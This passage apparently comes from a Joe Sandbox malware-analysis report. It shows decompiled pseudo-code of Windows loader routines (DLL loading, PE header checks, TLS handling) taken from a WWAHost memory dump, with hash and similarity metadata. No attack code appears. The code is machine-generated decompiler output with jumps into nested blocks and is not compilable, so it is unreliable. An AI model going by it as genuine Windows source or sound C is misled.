                                              				_v200 = _a12;
                                              				_t365 = _a8;
                                              				_v212 = _a16;
                                              				_v180 = _a24;
                                              				_v168 = 0;
                                              				_v157 = 0;
                                              				if( *_t2 != 0) {
                                              					__eflags = E03966600(0x3a452d8);
                                              					if(__eflags == 0) {
                                              						goto L1;
                                              					} else {
                                              						_v188 = 6;
                                              					}
                                              				} else {
                                              					L1:
                                              					_v188 = 9;
                                              				}
                                              				if(_t365 == 0) {
                                              					_v164 = 0;
                                              					goto L5;
                                              				} else {
                                              					_t363 =  *_t365 & 0x0000ffff;
                                              					_t341 = _t363 + 1;
                                              					if((_t365[1] & 0x0000ffff) < _t341) {
                                              						L109:
                                              						__eflags = _t341 - 0x80;
                                              						if(_t341 <= 0x80) {
                                              							_t281 =  &_v140;
                                              							_v164 =  &_v140;
                                              							goto L114;
                                              						} else {
                                              							_t283 =  *0x3a47b9c; // 0x0
                                              							_t281 = L03974620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
                                              							_v164 = _t281;
                                              							__eflags = _t281;
                                              							if(_t281 != 0) {
                                              								_v157 = 1;
                                              								L114:
                                              								E0399F3E0(_t281, _t365[2], _t363);
                                              								_t200 = _v164;
                                              								 *((char*)(_v164 + _t363)) = 0;
                                              								goto L5;
                                              							} else {
                                              								_t204 = 0xc000009a;
                                              								goto L47;
                                              							}
                                              						}
                                              					} else {
                                              						_t200 = _t365[2];
                                              						_v164 = _t200;
                                              						if( *((char*)(_t200 + _t363)) != 0) {
                                              							goto L109;
                                              						} else {
                                              							while(1) {
                                              								L5:
                                              								_t353 = 0;
                                              								_t342 = 0x1000;
                                              								_v176 = 0;
                                              								if(_t287 == 0) {
                                              									break;
                                              								}
                                              								_t384 = _t287 -  *0x3a47b90; // 0x77460000
                                              								if(_t384 == 0) {
                                              									_t353 =  *0x3a47b8c; // 0xb529e0
                                              									_v176 = _t353;
                                              									_t320 = ( *(_t353 + 0x50))[8];
                                              									_v184 = _t320;
                                              								} else {
                                              									E03972280(_t200, 0x3a484d8);
                                              									_t277 =  *0x3a485f4; // 0xb52f50
                                              									_t351 =  *0x3a485f8 & 1;
                                              									while(_t277 != 0) {
                                              										_t337 =  *(_t277 - 0x50);
                                              										if(_t337 > _t287) {
                                              											_t338 = _t337 | 0xffffffff;
                                              										} else {
                                              											asm("sbb ecx, ecx");
                                              											_t338 =  ~_t337;
                                              										}
                                              										_t387 = _t338;
                                              										if(_t387 < 0) {
                                              											_t339 =  *_t277;
                                              											__eflags = _t351;
                                              											if(_t351 != 0) {
                                              												__eflags = _t339;
                                              												if(_t339 == 0) {
                                              													goto L16;
                                              												} else {
                                              													goto L118;
                                              												}
                                              												goto L151;
                                              											} else {
                                              												goto L16;
                                              											}
                                              											goto L17;
                                              										} else {
                                              											if(_t387 <= 0) {
                                              												__eflags = _t277;
                                              												if(_t277 != 0) {
                                              													_t340 =  *(_t277 - 0x18);
                                              													_t24 = _t277 - 0x68; // 0xb52ee8
                                              													_t353 = _t24;
                                              													_v176 = _t353;
                                              													__eflags = _t340[3] - 0xffffffff;
                                              													if(_t340[3] != 0xffffffff) {
                                              														_t279 =  *_t340;
                                              														__eflags =  *(_t279 - 0x20) & 0x00000020;
                                              														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
                                              															asm("lock inc dword [edi+0x9c]");
                                              															_t340 =  *(_t353 + 0x50);
                                              														}
                                              													}
                                              													_v184 = _t340[8];
                                              												}
                                              											} else {
                                              												_t339 =  *(_t277 + 4);
                                              												if(_t351 != 0) {
                                              													__eflags = _t339;
                                              													if(_t339 == 0) {
                                              														goto L16;
                                              													} else {
                                              														L118:
                                              														_t277 = _t277 ^ _t339;
                                              														goto L17;
                                              													}
                                              													goto L151;
                                              												} else {
                                              													L16:
                                              													_t277 = _t339;
                                              												}
                                              												goto L17;
                                              											}
                                              										}
                                              										goto L25;
                                              										L17:
                                              									}
                                              									L25:
                                              									E0396FFB0(_t287, _t353, 0x3a484d8);
                                              									_t320 = _v184;
                                              									_t342 = 0x1000;
                                              								}
                                              								if(_t353 == 0) {
                                              									break;
                                              								} else {
                                              									_t366 = 0;
                                              									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
                                              										_t288 = _v164;
                                              										if(_t353 != 0) {
                                              											_t342 = _t288;
                                              											_t374 = E039ACC99(_t353, _t288, _v200, 1,  &_v168);
                                              											if(_t374 >= 0) {
                                              												if(_v184 == 7) {
                                              													__eflags = _a20;
                                              													if(__eflags == 0) {
                                              														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
                                              														if(__eflags != 0) {
                                              															_t271 = E03966600(0x3a452d8);
                                              															__eflags = _t271;
                                              															if(__eflags == 0) {
                                              																_t342 = 0;
                                              																_v169 = _t271;
                                              																_t374 = E03967926( *(_t353 + 0x50), 0,  &_v169);
                                              															}
                                              														}
                                              													}
                                              												}
                                              												if(_t374 < 0) {
                                              													_v168 = 0;
                                              												} else {
                                              													if( *0x3a4b239 != 0) {
                                              														_t342 =  *(_t353 + 0x18);
                                              														E039DE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
                                              													}
                                              													if( *0x3a48472 != 0) {
                                              														_v192 = 0;
                                              														_t342 =  *0x7ffe0330;
                                              														_t361 =  *0x3a4b218; // 0xb4bda406
                                              														asm("ror edi, cl");
                                              														 *0x3a4b1e0( &_v192, _t353, _v168, 0, _v180);
                                              														 *(_t361 ^  *0x7ffe0330)();
                                              														_t269 = _v192;
                                              														_t353 = _v176;
                                              														__eflags = _t269;
                                              														if(__eflags != 0) {
                                              															_v168 = _t269;
                                              														}
                                              													}
                                              												}
                                              											}
                                              											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
                                              												_t366 = 0xc000007a;
                                              											}
                                              											_t247 =  *(_t353 + 0x50);
                                              											if(_t247[3] == 0xffffffff) {
                                              												L40:
                                              												if(_t366 == 0xc000007a) {
                                              													__eflags = _t288;
                                              													if(_t288 == 0) {
                                              														goto L136;
                                              													} else {
                                              														_t366 = 0xc0000139;
                                              													}
                                              													goto L54;
                                              												}
                                              											} else {
                                              												_t249 =  *_t247;
                                              												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
                                              													goto L40;
                                              												} else {
                                              													_t250 = _t249 | 0xffffffff;
                                              													asm("lock xadd [edi+0x9c], eax");
                                              													if((_t249 | 0xffffffff) == 0) {
                                              														E03972280(_t250, 0x3a484d8);
                                              														_t342 =  *(_t353 + 0x54);
                                              														_t165 = _t353 + 0x54; // 0x54
                                              														_t252 = _t165;
                                              														__eflags =  *(_t342 + 4) - _t252;
                                              														if( *(_t342 + 4) != _t252) {
                                              															L135:
                                              															asm("int 0x29");
                                              															L136:
                                              															_t288 = _v200;
                                              															_t366 = 0xc0000138;
                                              															L54:
                                              															_t342 = _t288;
                                              															L03993898(0, _t288, _t366);
                                              														} else {
                                              															_t324 =  *(_t252 + 4);
                                              															__eflags =  *_t324 - _t252;
                                              															if( *_t324 != _t252) {
                                              																goto L135;
                                              															} else {
                                              																 *_t324 = _t342;
                                              																 *(_t342 + 4) = _t324;
                                              																_t293 =  *(_t353 + 0x50);
                                              																_v180 =  *_t293;
                                              																E0396FFB0(_t293, _t353, 0x3a484d8);
                                              																__eflags =  *((short*)(_t353 + 0x3a));
                                              																if( *((short*)(_t353 + 0x3a)) != 0) {
                                              																	_t342 = 0;
                                              																	__eflags = 0;
                                              																	E039937F5(_t353, 0);
                                              																}
                                              																E03990413(_t353);
                                              																_t256 =  *(_t353 + 0x48);
                                              																__eflags = _t256;
                                              																if(_t256 != 0) {
                                              																	__eflags = _t256 - 0xffffffff;
                                              																	if(_t256 != 0xffffffff) {
                                              																		E03989B10(_t256);
                                              																	}
                                              																}
                                              																__eflags =  *(_t353 + 0x28);
                                              																if( *(_t353 + 0x28) != 0) {
                                              																	_t174 = _t353 + 0x24; // 0x24
                                              																	E039802D6(_t174);
                                              																}
                                              																L039777F0( *0x3a47b98, 0, _t353);
                                              																__eflags = _v180 - _t293;
                                              																if(__eflags == 0) {
                                              																	E0398C277(_t293, _t366);
                                              																}
                                              																_t288 = _v164;
                                              																goto L40;
                                              															}
                                              														}
                                              													} else {
                                              														goto L40;
                                              													}
                                              												}
                                              											}
                                              										}
                                              									} else {
                                              										L0396EC7F(_t353);
                                              										L039819B8(_t287, 0, _t353, 0);
                                              										_t200 = E0395F4E3(__eflags);
                                              										continue;
                                              									}
                                              								}
                                              								L41:
                                              								if(_v157 != 0) {
                                              									L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                                              								}
                                              								if(_t366 < 0) {
                                              									L46:
                                              									 *_v212 = _v168;
                                              									_t204 = _t366;
                                              									L47:
                                              									_pop(_t354);
                                              									_pop(_t367);
                                              									_pop(_t289);
                                              									return E0399B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
                                              								} else {
                                              									_t206 =  *0x3a4b2f8; // 0x11f0000
                                              									if((_t206 |  *0x3a4b2fc) == 0 || ( *0x3a4b2e4 & 0x00000001) != 0) {
                                              										goto L46;
                                              									} else {
                                              										_t297 =  *0x3a4b2ec; // 0x100
                                              										_v200 = 0;
                                              										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
                                              											_t355 = _v168;
                                              											_t342 =  &_v208;
                                              											_t208 = E03A06B68(_v168,  &_v208, _v168, __eflags);
                                              											__eflags = _t208 - 1;
                                              											if(_t208 == 1) {
                                              												goto L46;
                                              											} else {
                                              												__eflags = _v208 & 0x00000010;
                                              												if((_v208 & 0x00000010) == 0) {
                                              													goto L46;
                                              												} else {
                                              													_t342 = 4;
                                              													_t366 = E03A06AEB(_t355, 4,  &_v216);
                                              													__eflags = _t366;
                                              													if(_t366 >= 0) {
                                              														goto L46;
                                              													} else {
                                              														asm("int 0x29");
                                              														_t356 = 0;
                                              														_v44 = 0;
                                              														_t290 = _v52;
                                              														__eflags = 0;
                                              														if(0 == 0) {
                                              															L108:
                                              															_t356 = 0;
                                              															_v44 = 0;
                                              															goto L63;
                                              														} else {
                                              															__eflags = 0;
                                              															if(0 < 0) {
                                              																goto L108;
                                              															}
                                              															L63:
                                              															_v112 = _t356;
                                              															__eflags = _t356;
                                              															if(_t356 == 0) {
                                              																L143:
                                              																_v8 = 0xfffffffe;
                                              																_t211 = 0xc0000089;
                                              															} else {
                                              																_v36 = 0;
                                              																_v60 = 0;
                                              																_v48 = 0;
                                              																_v68 = 0;
                                              																_v44 = _t290 & 0xfffffffc;
                                              																E0396E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
                                              																_t306 = _v68;
                                              																__eflags = _t306;
                                              																if(_t306 == 0) {
                                              																	_t216 = 0xc000007b;
                                              																	_v36 = 0xc000007b;
                                              																	_t307 = _v60;
                                              																} else {
                                              																	__eflags = _t290 & 0x00000001;
                                              																	if(__eflags == 0) {
                                              																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
                                              																		__eflags = _t349 - 0x10b;
                                              																		if(_t349 != 0x10b) {
                                              																			__eflags = _t349 - 0x20b;
                                              																			if(_t349 == 0x20b) {
                                              																				goto L102;
                                              																			} else {
                                              																				_t307 = 0;
                                              																				_v48 = 0;
                                              																				_t216 = 0xc000007b;
                                              																				_v36 = 0xc000007b;
                                              																				goto L71;
                                              																			}
                                              																		} else {
                                              																			L102:
                                              																			_t307 =  *(_t306 + 0x50);
                                              																			goto L69;
                                              																		}
                                              																		goto L151;
                                              																	} else {
                                              																		_t239 = L0396EAEA(_t290, _t290, _t356, _t366, __eflags);
                                              																		_t307 = _t239;
                                              																		_v60 = _t307;
                                              																		_v48 = _t307;
                                              																		__eflags = _t307;
                                              																		if(_t307 != 0) {
                                              																			L70:
                                              																			_t216 = _v36;
                                              																		} else {
                                              																			_push(_t239);
                                              																			_push(0x14);
                                              																			_push( &_v144);
                                              																			_push(3);
                                              																			_push(_v44);
                                              																			_push(0xffffffff);
                                              																			_t319 = E03999730();
                                              																			_v36 = _t319;
                                              																			__eflags = _t319;
                                              																			if(_t319 < 0) {
                                              																				_t216 = 0xc000001f;
                                              																				_v36 = 0xc000001f;
                                              																				_t307 = _v60;
                                              																			} else {
                                              																				_t307 = _v132;
                                              																				L69:
                                              																				_v48 = _t307;
                                              																				goto L70;
                                              																			}
                                              																		}
                                              																	}
                                              																}
                                              																L71:
                                              																_v72 = _t307;
                                              																_v84 = _t216;
                                              																__eflags = _t216 - 0xc000007b;
                                              																if(_t216 == 0xc000007b) {
                                              																	L150:
                                              																	_v8 = 0xfffffffe;
                                              																	_t211 = 0xc000007b;
                                              																} else {
                                              																	_t344 = _t290 & 0xfffffffc;
                                              																	_v76 = _t344;
                                              																	__eflags = _v40 - _t344;
                                              																	if(_v40 <= _t344) {
                                              																		goto L150;
                                              																	} else {
                                              																		__eflags = _t307;
                                              																		if(_t307 == 0) {
                                              																			L75:
                                              																			_t217 = 0;
                                              																			_v104 = 0;
                                              																			__eflags = _t366;
                                              																			if(_t366 != 0) {
                                              																				__eflags = _t290 & 0x00000001;
                                              																				if((_t290 & 0x00000001) != 0) {
                                              																					_t217 = 1;
                                              																					_v104 = 1;
                                              																				}
                                              																				_t290 = _v44;
                                              																				_v52 = _t290;
                                              																			}
                                              																			__eflags = _t217 - 1;
                                              																			if(_t217 != 1) {
                                              																				_t369 = 0;
                                              																				_t218 = _v40;
                                              																				goto L91;
                                              																			} else {
                                              																				_v64 = 0;
                                              																				E0396E9C0(1, _t290, 0, 0,  &_v64);
                                              																				_t309 = _v64;
                                              																				_v108 = _t309;
                                              																				__eflags = _t309;
                                              																				if(_t309 == 0) {
                                              																					goto L143;
                                              																				} else {
                                              																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
                                              																					__eflags = _t226 - 0x10b;
                                              																					if(_t226 != 0x10b) {
                                              																						__eflags = _t226 - 0x20b;
                                              																						if(_t226 != 0x20b) {
                                              																							goto L143;
                                              																						} else {
                                              																							_t371 =  *(_t309 + 0x98);
                                              																							goto L83;
                                              																						}
                                              																					} else {
                                              																						_t371 =  *(_t309 + 0x88);
                                              																						L83:
                                              																						__eflags = _t371;
                                              																						if(_t371 != 0) {
                                              																							_v80 = _t371 - _t356 + _t290;
                                              																							_t310 = _v64;
                                              																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
                                              																							_t292 =  *(_t310 + 6) & 0x0000ffff;
                                              																							_t311 = 0;
                                              																							__eflags = 0;
                                              																							while(1) {
                                              																								_v120 = _t311;
                                              																								_v116 = _t348;
                                              																								__eflags = _t311 - _t292;
                                              																								if(_t311 >= _t292) {
                                              																									goto L143;
                                              																								}
                                              																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
                                              																								__eflags = _t371 - _t359;
                                              																								if(_t371 < _t359) {
                                              																									L98:
                                              																									_t348 = _t348 + 0x28;
                                              																									_t311 = _t311 + 1;
                                              																									continue;
                                              																								} else {
                                              																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
                                              																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
                                              																										goto L98;
                                              																									} else {
                                              																										__eflags = _t348;
                                              																										if(_t348 == 0) {
                                              																											goto L143;
                                              																										} else {
                                              																											_t218 = _v40;
                                              																											_t312 =  *_t218;
                                              																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
                                              																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
                                              																												_v100 = _t359;
                                              																												_t360 = _v108;
                                              																												_t372 = L03968F44(_v108, _t312);
                                              																												__eflags = _t372;
                                              																												if(_t372 == 0) {
                                              																													goto L143;
                                              																												} else {
                                              																													_t290 = _v52;
                                              																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E03993C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
                                              																													_t307 = _v72;
                                              																													_t344 = _v76;
                                              																													_t218 = _v40;
                                              																													goto L91;
                                              																												}
                                              																											} else {
                                              																												_t290 = _v52;
                                              																												_t307 = _v72;
                                              																												_t344 = _v76;
                                              																												_t369 = _v80;
                                              																												L91:
                                              																												_t358 = _a4;
                                              																												__eflags = _t358;
                                              																												if(_t358 == 0) {
                                              																													L95:
                                              																													_t308 = _a8;
                                              																													__eflags = _t308;
                                              																													if(_t308 != 0) {
                                              																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
                                              																													}
                                              																													_v8 = 0xfffffffe;
                                              																													_t211 = _v84;
                                              																												} else {
                                              																													_t370 =  *_t218 - _t369 + _t290;
                                              																													 *_t358 = _t370;
                                              																													__eflags = _t370 - _t344;
                                              																													if(_t370 <= _t344) {
                                              																														L149:
                                              																														 *_t358 = 0;
                                              																														goto L150;
                                              																													} else {
                                              																														__eflags = _t307;
                                              																														if(_t307 == 0) {
                                              																															goto L95;
                                              																														} else {
                                              																															__eflags = _t370 - _t344 + _t307;
                                              																															if(_t370 >= _t344 + _t307) {
                                              																																goto L149;
                                              																															} else {
                                              																																goto L95;
                                              																															}
                                              																														}
                                              																													}
                                              																												}
                                              																											}
                                              																										}
                                              																									}
                                              																								}
                                              																								goto L97;
                                              																							}
                                              																						}
                                              																						goto L143;
                                              																					}
                                              																				}
                                              																			}
                                              																		} else {
                                              																			__eflags = _v40 - _t307 + _t344;
                                              																			if(_v40 >= _t307 + _t344) {
                                              																				goto L150;
                                              																			} else {
                                              																				goto L75;
                                              																			}
                                              																		}
                                              																	}
                                              																}
                                              															}
                                              															L97:
                                              															 *[fs:0x0] = _v20;
                                              															return _t211;
                                              														}
                                              													}
                                              												}
                                              											}
                                              										} else {
                                              											goto L46;
                                              										}
                                              									}
                                              								}
                                              								goto L151;
                                              							}
                                              							_t288 = _v164;
                                              							_t366 = 0xc0000135;
                                              							goto L41;
                                              						}
                                              					}
                                              				}
                                              				L151:
                                              			}
                                              0x0396db74
                                              0x0396dc9f
                                              0x0396dca2
                                              0x0396dcb0
                                              0x0396dcb0
                                              0x0396dad1
                                              0x039bb4e5
                                              0x039bb4c8
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0396d831
                                              0x0396d80d
                                              0x00000000
                                              0x0396d800
                                              0x039bb47f
                                              0x039bb485
                                              0x00000000
                                              0x039bb485
                                              0x0396d665
                                              0x0396d652
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 82aef15be04c9de39235a024d7b1903de20f3305e93b2fafcb3249d62666fb0f
                                              • Instruction ID: 7a51933c7de7d23a0f7f962d5115ddfccd8ebabfd3061f0f218d743bdbab0ddd
                                              • Opcode Fuzzy Hash: 82aef15be04c9de39235a024d7b1903de20f3305e93b2fafcb3249d62666fb0f
                                              • Instruction Fuzzy Hash: 71E1E574B02359CFDB24EF18C984BA9B7BABF85344F0801E9D9199B290D774AD81CF52
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 92%
                                              			E0396849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
                                              				void* _t136;
                                              				signed int _t139;
                                              				signed int _t141;
                                              				signed int _t145;
                                              				intOrPtr _t146;
                                              				signed int _t149;
                                              				signed int _t150;
                                              				signed int _t161;
                                              				signed int _t163;
                                              				signed int _t165;
                                              				signed int _t169;
                                              				signed int _t171;
                                              				signed int _t194;
                                              				signed int _t200;
                                              				void* _t201;
                                              				signed int _t204;
                                              				signed int _t206;
                                              				signed int _t210;
                                              				signed int _t214;
                                              				signed int _t215;
                                              				signed int _t218;
                                              				void* _t221;
                                              				signed int _t224;
                                              				signed int _t226;
                                              				intOrPtr _t228;
                                              				signed int _t232;
                                              				signed int _t233;
                                              				signed int _t234;
                                              				void* _t237;
                                              				void* _t238;
                                              
                                              				_t236 = __esi;
                                              				_t235 = __edi;
                                              				_t193 = __ebx;
                                              				_push(0x70);
                                              				_push(0x3a2f9c0);
                                              				E039AD0E8(__ebx, __edi, __esi);
                                              				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
                                              				if( *0x3a47b04 == 0) {
                                              					L4:
                                              					goto L5;
                                              				} else {
                                              					_t136 = E0396CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
                                              					_t236 = 0;
                                              					if(_t136 < 0) {
                                              						 *((intOrPtr*)(_t237 - 0x54)) = 0;
                                              					}
                                              					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
                                              						_t193 =  *( *[fs:0x30] + 0x18);
                                              						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
                                              						 *(_t237 - 0x68) = _t236;
                                              						 *(_t237 - 0x6c) = _t236;
                                              						_t235 = _t236;
                                              						 *(_t237 - 0x60) = _t236;
                                              						E03972280( *[fs:0x30], 0x3a48550);
                                              						_t139 =  *0x3a47b04; // 0x1
                                              						__eflags = _t139 - 1;
                                              						if(__eflags != 0) {
                                              							_t200 = 0xc;
                                              							_t201 = _t237 - 0x40;
                                              							_t141 = E0398F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
                                              							 *(_t237 - 0x44) = _t141;
                                              							__eflags = _t141;
                                              							if(_t141 < 0) {
                                              								L50:
                                              								E0396FFB0(_t193, _t235, 0x3a48550);
                                              								L5:
                                              								return E039AD130(_t193, _t235, _t236);
                                              							}
                                              							_push(_t201);
                                              							_t221 = 0x10;
                                              							_t202 =  *(_t237 - 0x40);
                                              							_t145 = E03951C45( *(_t237 - 0x40), _t221);
                                              							 *(_t237 - 0x44) = _t145;
                                              							__eflags = _t145;
                                              							if(_t145 < 0) {
                                              								goto L50;
                                              							}
                                              							_t146 =  *0x3a47b9c; // 0x0
                                              							_t235 = L03974620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
                                              							 *(_t237 - 0x60) = _t235;
                                              							__eflags = _t235;
                                              							if(_t235 == 0) {
                                              								_t149 = 0xc0000017;
                                              								 *(_t237 - 0x44) = 0xc0000017;
                                              							} else {
                                              								_t149 =  *(_t237 - 0x44);
                                              							}
                                              							__eflags = _t149;
                                              							if(__eflags >= 0) {
                                              								L8:
                                              								 *(_t237 - 0x64) = _t235;
                                              								_t150 =  *0x3a47b10; // 0x9
                                              								 *(_t237 - 0x4c) = _t150;
                                              								_push(_t237 - 0x74);
                                              								_push(_t237 - 0x39);
                                              								_push(_t237 - 0x58);
                                              								_t193 = E0398A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
                                              								 *(_t237 - 0x44) = _t193;
                                              								__eflags = _t193;
                                              								if(_t193 < 0) {
                                              									L30:
                                              									E0396FFB0(_t193, _t235, 0x3a48550);
                                              									__eflags = _t235 - _t237 - 0x38;
                                              									if(_t235 != _t237 - 0x38) {
                                              										_t235 =  *(_t237 - 0x48);
                                              										L039777F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
                                              									} else {
                                              										_t235 =  *(_t237 - 0x48);
                                              									}
                                              									__eflags =  *(_t237 - 0x6c);
                                              									if( *(_t237 - 0x6c) != 0) {
                                              										L039777F0(_t235, _t236,  *(_t237 - 0x6c));
                                              									}
                                              									__eflags = _t193;
                                              									if(_t193 >= 0) {
                                              										goto L4;
                                              									} else {
                                              										goto L5;
                                              									}
                                              								}
                                              								_t204 =  *0x3a47b04; // 0x1
                                              								 *(_t235 + 8) = _t204;
                                              								__eflags =  *((char*)(_t237 - 0x39));
                                              								if( *((char*)(_t237 - 0x39)) != 0) {
                                              									 *(_t235 + 4) = 1;
                                              									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
                                              									_t161 =  *0x3a47b10; // 0x9
                                              									 *(_t237 - 0x4c) = _t161;
                                              								} else {
                                              									 *(_t235 + 4) = _t236;
                                              									 *(_t235 + 0xc) =  *(_t237 - 0x58);
                                              								}
                                              								 *((intOrPtr*)(_t237 - 0x54)) = E039937C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
                                              								_t224 = _t236;
                                              								 *(_t237 - 0x40) = _t236;
                                              								 *(_t237 - 0x50) = _t236;
                                              								while(1) {
                                              									_t163 =  *(_t235 + 8);
                                              									__eflags = _t224 - _t163;
                                              									if(_t224 >= _t163) {
                                              										break;
                                              									}
                                              									_t228 =  *0x3a47b9c; // 0x0
                                              									_t214 = L03974620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
                                              									 *(_t237 - 0x78) = _t214;
                                              									__eflags = _t214;
                                              									if(_t214 == 0) {
                                              										L52:
                                              										_t193 = 0xc0000017;
                                              										L19:
                                              										 *(_t237 - 0x44) = _t193;
                                              										L20:
                                              										_t206 =  *(_t237 - 0x40);
                                              										__eflags = _t206;
                                              										if(_t206 == 0) {
                                              											L26:
                                              											__eflags = _t193;
                                              											if(_t193 < 0) {
                                              												E039937F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
                                              												__eflags =  *((char*)(_t237 - 0x39));
                                              												if( *((char*)(_t237 - 0x39)) != 0) {
                                              													 *0x3a47b10 =  *0x3a47b10 - 8;
                                              												}
                                              											} else {
                                              												_t169 =  *(_t237 - 0x68);
                                              												__eflags = _t169;
                                              												if(_t169 != 0) {
                                              													 *0x3a47b04 =  *0x3a47b04 - _t169;
                                              												}
                                              											}
                                              											__eflags = _t193;
                                              											if(_t193 >= 0) {
                                              												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
                                              											}
                                              											goto L30;
                                              										}
                                              										_t226 = _t206 * 0xc;
                                              										__eflags = _t226;
                                              										_t194 =  *(_t237 - 0x48);
                                              										do {
                                              											 *(_t237 - 0x40) = _t206 - 1;
                                              											_t226 = _t226 - 0xc;
                                              											 *(_t237 - 0x4c) = _t226;
                                              											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
                                              											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
                                              												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
                                              												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
                                              													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
                                              													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                              													__eflags =  *((char*)(_t237 - 0x39));
                                              													if( *((char*)(_t237 - 0x39)) == 0) {
                                              														_t171 = _t210;
                                              													} else {
                                              														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
                                              														L039777F0(_t194, _t236, _t210 - 8);
                                              														_t171 =  *(_t237 - 0x50);
                                              													}
                                              													L48:
                                              													L039777F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
                                              													L46:
                                              													_t206 =  *(_t237 - 0x40);
                                              													_t226 =  *(_t237 - 0x4c);
                                              													goto L24;
                                              												}
                                              												 *0x3a47b08 =  *0x3a47b08 + 1;
                                              												goto L24;
                                              											}
                                              											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                              											__eflags = _t171;
                                              											if(_t171 != 0) {
                                              												__eflags =  *((char*)(_t237 - 0x39));
                                              												if( *((char*)(_t237 - 0x39)) == 0) {
                                              													goto L48;
                                              												}
                                              												E039957C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
                                              												goto L46;
                                              											}
                                              											L24:
                                              											__eflags = _t206;
                                              										} while (_t206 != 0);
                                              										_t193 =  *(_t237 - 0x44);
                                              										goto L26;
                                              									}
                                              									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
                                              									 *(_t237 - 0x7c) = _t232;
                                              									 *(_t232 - 4) = _t214;
                                              									 *(_t237 - 4) = _t236;
                                              									E0399F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
                                              									_t238 = _t238 + 0xc;
                                              									 *(_t237 - 4) = 0xfffffffe;
                                              									_t215 =  *(_t237 - 0x48);
                                              									__eflags = _t193;
                                              									if(_t193 < 0) {
                                              										L039777F0(_t215, _t236,  *(_t237 - 0x78));
                                              										goto L20;
                                              									}
                                              									__eflags =  *((char*)(_t237 - 0x39));
                                              									if( *((char*)(_t237 - 0x39)) != 0) {
                                              										_t233 = E0398A44B( *(_t237 - 0x4c));
                                              										 *(_t237 - 0x50) = _t233;
                                              										__eflags = _t233;
                                              										if(_t233 == 0) {
                                              											L039777F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
                                              											goto L52;
                                              										}
                                              										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
                                              										L17:
                                              										_t234 =  *(_t237 - 0x40);
                                              										_t218 = _t234 * 0xc;
                                              										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
                                              										 *(_t218 + _t235 + 0x10) = _t236;
                                              										_t224 = _t234 + 1;
                                              										 *(_t237 - 0x40) = _t224;
                                              										 *(_t237 - 0x50) = _t224;
                                              										_t193 =  *(_t237 - 0x44);
                                              										continue;
                                              									}
